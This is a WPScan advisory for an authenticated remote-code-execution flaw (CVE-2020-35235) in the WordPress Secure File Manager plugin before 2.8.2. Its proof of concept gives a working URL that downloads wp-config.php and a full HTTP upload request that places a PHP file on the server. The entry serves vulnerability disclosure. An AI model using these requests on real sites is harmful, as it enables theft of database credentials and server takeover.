WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Secure File Manager < 2.8.2 - Authenticated Remote Code Execution

Description

The Secure File Manager uses the elFinder libraries in an insecure way, allowing authenticated users to execute arbitrary file management commands.

v2.6 attempted to fix the issue by adding a CSRF nonce, however the nonce is displayed for all users in the Dashboard via the Secure File Manager menu (even though it will display an Unauthorized Access error for non admin users)

Proof of Concept

Download the wp-config.php

< 2.6 - As an unauthenticated user, open /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&cpath=/wp-admin/admin.php

< 2.8.2 - Log in as any user, access the Secure File Manager menu (wp-admin/admin.php?page=sfm_file_manager) which will result in an Unauthorized Access error unless logged in as admin, view the source of the page and retrieve the value of the sfmpNonceKey. Then append it to the URL above in a _wnonce parameter:

/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&_wpnonce=69f62e1414&cpath=/wp-admin/admin.php


RCE can be obtained as well, with a crafted request to upload a PHP file, e.g /hello-user.php

for < 2.8.2, get the nonce with the same technique as above
for < 2.6, just remove the _wpnonce parameter

POST /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/admin.php?page=sfm_file_manager
Content-Type: multipart/form-data; boundary=---------------------------32138351926630035821198693946
Content-Length: 851
Origin: http://127.0.0.1
Connection: close
Cookie: [Subscriber cookie]

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="reqid"

1770034af3e3c9
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="cmd"

upload
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="_wpnonce"

69f62e1414
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="upload[]"; filename="hello-user.php"
Content-Type: text/plain

<?php echo 'failed'; ?>

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="mtime[]"

1375102826
-----------------------------32138351926630035821198693946--

Affects Plugins

secure-file-manager
Fixed in version 2.8.2

References

CVE
CVE-2020-35235
URL
https://blog.nintechnet.com/authenticated-rce-vulnerability-in-wordpress-secure-file-manager-plugin-unpatched/

Classification

Type

RCE

OWASP top 10
A1: Injection
CWE
CWE-94

Miscellaneous

Original Researcher

NinTechNet

Verified

Yes

WPVDB ID
47c1639f-4558-4cb6-8f50-e5e8564663c2

Timeline

Publicly Published

2020-11-23 (about 2 years ago)

Added

2020-11-23 (about 2 years ago)

Last Updated

2021-06-08 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin